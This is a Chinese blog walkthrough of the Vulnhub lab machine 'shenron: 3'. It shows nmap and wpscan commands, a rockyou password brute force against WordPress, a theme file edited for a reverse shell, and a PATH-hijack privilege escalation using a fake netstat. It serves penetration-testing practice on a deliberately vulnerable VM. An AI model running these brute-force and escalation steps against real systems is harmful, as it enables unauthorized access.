Vulnhub: shenron: 3靶机

最新推荐文章于 2024-06-14 08:27:12 发布

ctostm

最新推荐文章于 2024-06-14 08:27:12 发布

阅读量929

点赞数

文章标签： web安全网络安全安全

本文链接：https://blog.csdn.net/qq_43884092/article/details/132025201

版权

kali：192.168.111.111

靶机：192.168.111.171

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.171

修改hosts后访问目标80端口，发现是wordpress

wpscan收集目标用户，爆破出密码：iloverockyou

wpscan --url http://shenron/ -e u
wpscan --url http://shenron/ -U admin -P /usr/share/wordlists/rockyou.txt

登录后修改目标源码拿shell

修改后访问http://shenron/wp-content/themes/twentyeleven/404.php获得反弹shell

提权

shenron用户的密码也是iloverockyou

在shenron用户家目录下发现network程序，执行后发现该程序会执行netstat命令，修改环境变量提权

echo '/bin/bash' > /tmp/netstat
chmod 777 /tmp/netstat
export PATH=/tmp:$PATH
./network

flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ctostm

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
Vulnhub: shenron: 3靶机

wordpress后台账号密码爆破，环境变量提权
复制链接

扫一扫

Vulnhub靶机——SHENRON: 1

qq_51295120的博客

02-20

3856

靶机下载链接在这 1. 主机发现： VMware和VirtualBox进行互通：靶机：VirtualBox管理器中靶机网卡一设置桥接网卡，网卡二设置仅主机模式 kali：设置桥接模式即可识别存活的主机，发现攻击的目标： netdiscover -r 172.16.10.0/24 -i eth0 目标服务器为172.16.10.124 2.信息收集使用nmap进行全端口服务版本扫描：靶机服务器只开启了22和80端口。 3. 渗透测试 ssh进行密码爆破时发现不能使用密码登录，只能私钥进行访

Vulnhub-shenron-3：神龙3靶机渗透攻略

weixin_47311099的博客

02-10

3146

下载链接：https://www.vulnhub.com/entry/shenron-3,682/ 需要拿到两面flag 信息收集 nmap扫描 nmap -sC -sV 192.168.210.209 只有一个80端口网站信息收集看来得添加hosts解析，跟同系列靶机一个套路页面正常发现cms还是wordpress 目录扫描 dirb http://shenron 找到个后台登录页面 wordpress漏洞利用 wpscan扫描 wpscan --url http://shenr

参与评论您还未登录，请先登录后发表或查看评论

Vulnhub-shenron-1：神龙1靶机渗透攻略

weixin_47311099的博客

01-20

1131

下载地址：http://www.vulnhub.com/entry/shenron-1,630/ 虚拟化环境virtualbox 目标：获取两个flag 信息收集 nmap扫描 nmap -sC -sV 192.168.210.181 发现80http ，22ssh ![image.png](https://img-blog.csdnimg.cn/img_convert/f850d2f9e663b06b6f03af1f42bedae3.png#clientId=u9ae3eb84-40cb-4&

Vulnhub-shenron-2：神龙2靶机渗透攻略

weixin_47311099的博客

02-10

3351

下载地址 https://www.vulnhub.com/entry/shenron-2,677/ 启动环境virtualbox，若启动报错更改虚拟机中usb配置为1.1即可需要获得两个flag 信息收集 nmap扫描 nmap -sC -sV 192.168.210.220 发现22ssh，80和8080http 网站信息 80端口暂未发现有效信息 8080端口打开这个鬼样子，需要添加dns解析才可正常访问去kali的hosts文件中添加一下域名解析再访问就正常了发现

game-in1-rawi-olavM

04-07

该游戏是基于鹿特丹Emmauscollege的4HV模板我的游戏：游戏名称由...制作：奥拉夫v迈登拉威·比达尔（Rawi ... NPC的列表：BHead（重设世界），Shenron（如果您将7个特殊物品放在一起，他会给他一个愿望），Liqu

DBS TCG Quick Search-crx插件

03-19

在CardMarket或TCGPlayer上搜索卡，即可快速访问Meta Decks，DBS Decks主页和Shenron的Lair DB。将卡名称放在搜索栏上，然后按Enter键，您将被重定向到CardMarket（EU）或TCGPlayer（USA / CA / NZ / AU）。按DBS ...

网络安全（补充）

m0_62207482的博客

06-11

605

上下文因素主要有事务、设备和网络模式。例如一些网站的访问根据地址位置信息来判断来访者的身份，以确认是否授权访问 Kerberos系统涉及四个基本实体：1Kerberos客户机（用户用来访问服务器设备）、2AS（认证服务器，识别用户身份并提供TGS会话密钥）、3（TGS票据发放服务器、未申请服务的用户授予票据）、4（应用服务器，为用户提供服务的设备或系统）一般来说，PKI涉及多个实体之间的协商和操作，主要实体包括CA、RA、终端实体、客户端、目录服务器身份认证网关产品的技术特点是利用数字证书、根据同

网络安全攻防演练：提升应急响应能力

最新发布

weixin_64392888的博客

06-14

486

随着网络威胁的不断演变，组织需要持续投入资源和精力，通过攻防演练等手段，构建更加安全和健壮的网络环境。在网络攻击日益频繁和复杂的今天，网络安全攻防演练成为提升组织应急响应能力的重要手段。在一次模拟钓鱼攻击的演练中，攻击团队通过发送带有恶意链接的电子邮件，成功绕过了部分员工的警惕。演练结束后，组织加强了员工的网络安全培训，并更新了钓鱼攻击的防御策略。网络安全攻防演练是一种主动的安全测试方法，它通过模拟攻击者的行为，评估组织的网络安全防护措施和应急响应流程的有效性。分析演练过程，评估攻击和防御的效果。

国内外网络安全现状分析

waitaikong_的博客

06-10

503

综上所述，无论是国内还是国际层面，网络安全都是一个复杂且不断演变的领域。面对日益严峻的网络安全威胁，需要政府、企业和个人共同努力，不断提升技术防护能力，加强法律法规建设，并通过国际合作共同应对挑战。同时，加强网络安全教育和人才培养也是保障网络安全的重要环节。在未来，随着技术的不断进步和国际合作的加深，我们有理由相信网络安全状况将会得到进一步的改善。

网络安全练气篇——OWASP TOP 10

weixin_55762309的博客

06-13

723

OWASP（开放式Web应用程序安全项目）是一个开放的社区，由非营利组织 OWASP基金会支持的项目。对所有致力于改进应用程序安全的人士开放，旨在提高对应用程序安全性的认识。其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ，总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞，是开发、测试、服务、咨询人员应知应会的知识。最重要的版本应用程序中最严重的十大风险。

【网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测，实时检测，深度学习【一】

q742971636的博客

06-09

1335

Mininet: 主要用于创建和模拟虚拟网络拓扑，适合于网络实验和研究。Ryu: 主要用于开发和运行 SDN 控制器，用于管理和控制网络设备。这两个工具通常可以结合使用：使用 Mininet 模拟网络环境，使用 Ryu 作为 SDN 控制器来管理模拟网络中的设备和流量。

网络安全练气篇——PHP编程语言基础

weixin_55762309的博客

06-13

797

(外文名:PHP:Hypertext Preprocessor，中文名:“超文本预处理器”) 是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点，利于学习，使用广泛，主要适用于Web开发领域。用PHP做出的动态页面与其他的编程语言相比，PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用) 文档中去执行，执行效率比完全生成HTML标记的CGI要高许多，PHP还可以执行编译后代码，编译可以达到加密和优化代码运行，使代码运行更快。

网络安全在个人生活中具体有哪些常见的应用场景？

2301_79955948的博客

06-10

389

通过上述场景可以看出，网络安全在个人生活中扮演着至关重要的角色，它不仅关系到个人隐私和财产安全，也影响到日常生活的方方面面。7. 物联网设备安全：网络安全可以保护智能家居、智能设备等物联网设备的安全，避免网络攻击和数据泄露。5. 远程办公和学习：网络安全可以保障企业和学校网络系统的安全和稳定性，避免数据泄露和网络攻击。6. 云存储和备份：网络安全可以保护云存储服务和备份数据的安全，防止黑客攻击和数据泄露。8. 移动设备安全：网络安全可以保护移动设备的安全和数据隐私，防止恶意软件和网络攻击。

网络安全练气篇——常见服务端口对应漏洞

weixin_55762309的博客

06-12

761

FTP服务的数据传输端口。

46-4 等级保护 - 网络安全等级保护概述

weixin_43263566的博客

06-10

123

没有网络安全就没有国家安全。

网络安全练气篇——操作系统基础

weixin_55762309的博客

06-13

669

网络安全练气篇——操作系统基础

45-3 护网溯源 - 为什么要做溯源工作

weixin_43263566的博客

06-05

429

预防未来攻击：通过分析攻击行为和手段，可以洞察攻击者的模式和策略，为未来的安全防御工作提供参考和指导。提升安全意识：护网溯源工作可以增强组织内部人员的安全意识，让他们意识到网络安全的重要性，学习如何应对各种网络攻击，从而更好地保护自身和组织的信息资产安全。司法追责：对于违法犯罪行为，溯源工作可以为司法机关提供关键证据，支持对攻击者进行定罪和处罚。修复漏洞：溯源工作可以揭示攻击者利用的漏洞和弱点，有助于及时修复系统和应用程序中的安全漏洞，减少被利用的可能性，提高系统的稳定性和安全性。

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交